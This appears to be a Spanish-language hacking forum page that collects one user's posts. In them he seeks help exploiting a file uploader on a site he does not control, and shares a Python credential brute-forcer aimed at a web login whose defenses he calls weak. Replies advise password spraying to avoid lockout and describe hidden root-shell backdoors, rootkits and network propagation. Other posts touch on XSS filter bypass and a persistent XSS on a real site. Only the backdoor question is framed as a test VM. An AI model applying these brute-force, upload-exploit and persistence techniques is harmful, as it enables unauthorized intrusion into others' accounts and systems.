Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - darkchoto

#1
Muchas gracias
#2
Buenas amigos pues lo que dice en el titulo, que webs con listados de proxys mas o menos fiables conocen y recomiendan para usar ?
#3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Estas siguiendo un tutorial que te hace armar un form apuntandole al mismo lugar que el form de la web? esta re mal eso

Tenes que editar la peticion despues de que la manda el navegador pero antes de que salga a internet. Usá burp
No, no sigo ningún tutorial.
El .php al abrirlo directamente en el navegador solo imprime el texto archivo subido, creo que lo incluye otro script al que no tengo acceso, en la misma carpeta esta ese .js que veo se comunica con el .php, de hecho tengo varios .php con nombres parecidos que hacen referencia a ser uploaders, algunos responden con un error de que no hay archivo, expresados en notacion JSON, otros no muestran nada, pero ninguno desplica un form, todos parecen ser llamados desde algún script de panel central al que como comenté antes no tengo acceso.
#4
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Se explota como cualquier otro uploader, usa burp o algo parecido

En esta pagina tenes la ventaja de que podes jugar con los parametros que van por get
Gracias por responder amgio y lamento no haber respondido antes no me habia percatado de la respuesta.
El asutno es que no se que tendria que hacer, por lo que he investigado al usar AJAX el archivo lo manda ese .js al .phpque se ve en el codigo  y el lo procesa y lo carga en el server.
Lo que no entiendo es que debo generar en mi pc para que se suba el archivo, es decir, supongo que debe ser un .html que llame a ese .js, el .html pintará el uploader pero no entiendo que valor deberia tener el form en action (creo que nada porque al estar llamando al .js el es quien se encarga, creo que deberia tener un id algo así coo formname segun veo en el codigo javascript) y que id deberia tener el input de tipo file para que el .js haga bien la peticion GET que se ve que hace en el codigo.
Un saludo
#5
Buenas, empiezo por decir que tengo conocimientos muy básicos en javascript y he encontrado un uploader que entiendo está hecho para funcionar con AJAX puesto que usa XMLHttpRequest(), espero me ayuden a entender el codigo y me ilustren sobre como seria el payload a usar para subir algo.

Acontinuación el codigo:

Código: javascript
var http = createRequestObject();
var uploader = '';

function createRequestObject() {
    var obj;
    var browser = navigator.appName;
   
    if(browser == "Microsoft Internet Explorer"){
        obj = new ActiveXObject("Microsoft.XMLHTTP");
    }
    else{
        obj = new XMLHttpRequest();
    }
    return obj;   
}

function traceUpload(uploadDir) {
         
   http.onreadystatechange = handleResponse;

   http.open("GET", 'sube_archivo.php?uploadDir='+uploadDir+'&uploader='+uploader);
   http.send(null);   
}

function handleResponse() {

    if(http.readyState == 4){
        document.getElementById(uploaderId).innerHTML = http.responseText;
        //window.location.reload(true);
    }
    else {
        document.getElementById(uploaderId).innerHTML = "Uploading File. Please wait...";
    }
}

function uploadFile(obj) {
    var uploadDir = obj.value;
    uploaderId = 'uploader'+obj.name;
    uploader = obj.name;
   
    document.getElementById('formName'+obj.name).submit();
    traceUpload(uploadDir, obj.name);   


Espero me puedan ayudar y gracias.

#6
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta! Para hacerlo podés recurrir a la clase Thread del módulo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Una recomendación: hacé un ataque por contraseña en vez de hacerlo por usuario. Con eso evitás que bloqueen el ataque. Creá una lista de contraseñas comunes y obtené una lista de usuarios de la aplicación web a analizar (podrías hacer una app para eso tmb). Con las dos listas en mano, probá múltiples usuarios por contraseña. Sería algo así :

Código: python
passwords= [] 
users = []

for password in passwords:
    for user in users:
        try:
            # resto del código
        except Exception as e:
            # manejo de errores


Saludos!
WhiZ
Gracias por tu respuesta, entiendo tu sugerencia y es excelente idea, aunque en el sitio que uso mi bruteforcer no necesito hacerlo de esa forma porque sus medidas de seguridad contra bruteforcing de contraseñas a sus usuarios son muy pobres.

Pasando al real motivo de mi post (la aplicacion de multi-threading) a mi script para acelerar el proceso, he leido y creo entender un mas o menos como funciona la clase mencionada pero no logro aplicarlo a mi script. He leido que lo mas recomendable en casos parecidos al mio es usar colas con el modulo Queue, aunque no comprendo bien como hacerlo funcionar con mi script y poder seguir usando la parte del contador de passwords.

Espero tu o alguien mas me pueda dar una luz con esto.
#7
Buenas a todos.

Me he programado un script que me hace bruteforce de usuarios y contraseñas en una web x, el asunto es que mi script funciona a la perfeccion pero es algo lento. Me gustaria saber como implementarle threading para acelerar el proceso de bruteforce.

La parte del codigo que hace el brute es la siguiente:

Código: python
#users y passwords son dos listas como se debe suponer
for i in range(len(users)):
post['user'] = users[i]
print '\nProbando usuario: %s' % users[i]
for x in range(len(passwords)):
post['pass'] = passwords[x]
r = requests.post('http://x.com' , data=post , headers=headers)
#Esta parte solo muestra en la terminal con la de las pass que se han probado y la password en si en que va
sys.stdout.write('\rPassword: %s %s/%s' % (passwords[x],passwords.index(passwords[x])+1,len(passwords)))
sys.stdout.flush()
if not r.content.find('Welcome') > -1:
continue
else:
print '\nUser:%s Password:%s' % (users[i],passwords[x])
break



De ante mano gracias a cualquier ayuda que me puedan brindar.
#8
Dudas y pedidos generales / Re:Backdoor en linux
Agosto 16, 2015, 04:49:36 AM
Para quien pueda llegar a leer este post:

Lo que quiero hacer es algo como lo que dice en la sección "DEJANDO PUESTAS TRASERAS" de este enlace No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#9
Dudas y pedidos generales / Re:Backdoor en linux
Agosto 16, 2015, 04:31:17 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (me causo gracia tu nick, jaja) Efectivamente posteaste en la sección correcta, y por tu duda te diria que uses No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , es muy conocido y efectivo en el asunto de los backdoors, y tiene mucha documentación por internet, Espero que te sirva de algo.

Saludos!

Gracias por tu respuesta. y si, me sirve de mucho.
Pienso en algo que me deje una shell con permisos de root después de hacer cierto proceso de autenticación para que no pueda ser vista por alguien mas, podrías describirle el proceso a grandes rasgos para lograr algo así ?.
#10
Dudas y pedidos generales / Re:Backdoor en linux
Agosto 16, 2015, 04:24:52 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
La verdad no soy ningun experto, pero tienes un amplio conjunto de opciones. Dependiendo de lo sigiloso que puedas ser elige. Puedes añadir un servicio que espere a que se conecten a él, y al hacerlo que te mande una shell.

Problema: una shell voladora es facil de ver para la mayoria de adminsitradores/ o sistemas de detección. Solución: esta conexión puede ser, evidentmente encriptada para facilitar la tarea. Otro problema es que se conecte otro; solución ... por ejemplo que solo mande la shell después de recibir unos caracteres arbitrarios y evidentmente predeterminados por ti.
Para que sea menos visible el puerto escuchando... algo muy ruidoso, y encima en un puerto que nunca ha sido usado... puedes hacer que solo escuche en intervalos determinados de tiempo.

Montar un script que cambie permisos de una cuenta sin credenciales a una determinada hora para que puedas conectarte sin llamar la atención... etc etc

Otra solución seria incrustar un rootkit, algo más complejo de programar, pero al trabajar desde memoria el control que tienes es masivo. Ocultar procesos y demás desde aquí es algo mucho más manejable seria bastante invisible. Algunos se inyectan en las capas más internas.

Depende del uso que se le de a la máquina puedes buscar maneras de expandir y propagar tu control sobre el entorno y la red. Infectar puertos usb, redes internas, redes wireless cercanos...

Como ves puedes hacer mil cosas, lo bonito de esto es que es un proceso bastante creativo.

Un saludo

Gracias por la respuesta, algo así a lo que comentas como shell voladora, me gustaría si te es posible me ampliaras el proceso a grandes rasgos tendría que realizar para esto?.
#11
Buenas chicos tengo la siguiente inquietud:

Estoy en un server linux vulnerable, el cual he explotado y elevado privilegios (maquina virtual de pruebas con server vulnerable). lo que me gustaría saber son técnicas para dejar una puerta trasera persistente en el sistema explotado, es decir, que cuando quiera volver a entrar a esta maquina no tenga que explotar/elevar privilegios nuevamente.

Gracias por cualquier ayuda.

PD: Espero esta sea la zona idónea para dejar este tema, de no ser así favor mover a la zona correspondiente.
#12
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
joder, por mi salud mental, alguien puede dar una pista de este wargame ?
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta echa un ojo a esto y mira lo básico de javascript (variables, operadores, concatenación, etc) y lo resolverán sin problemas.
pero se reemplaza alert y javascript, ahí es donde tengo problemas, no encuentro como ejecutar javascript sin poder meter alguna de esas palabras.
#13
joder, por mi salud mental, alguien puede dar una pista de este wargame ?
#14
Ok amigo gracias, ya mismo me pongo a investigar como hacer lo que quiero.
#15
Hola a todos y de ante mano gracias por cualquier respuesta que me puedan dar.

Mi pregunta es la siguiente:

Necesito crear un script en python que le pase una url usando una cookie puesto que la url está bajo contraseña y el script tome de una lista de enlaces que hay en esa pagina los abra cada uno y envie unos datos en un formulario que hay en cada pagina.

Como podria hacer esto, que modulo debo aprender a usar?

PD: Hago esta pregunta tan basica puesto que tengo algunos conocimientos muy basicos en programacion en el lenguaje python
#16
Te dejo este articulo para complementar lo que ya te han dicho No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#18
Dudas y pedidos generales / Re:.exe .dat
Enero 31, 2013, 02:47:14 AM
lo peor es que ya a hecho esta misma pregunta en otro foro y se la habian contestado con una explicacion parecida a la que le dieron aqui
#19
Hacking ShowOff / Re:XSS Persistente Rio2016
Enero 26, 2013, 07:15:32 PM
pss a mi tampoco me sale al buscar cualquier cosa solo si pongo "> ahi si me sale el persistente
#20
y yo que creia que el poder subir archivos sin registrarme era normal, no había prestado atencion, le doy al boton rojo y de plano me dice que suba algo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta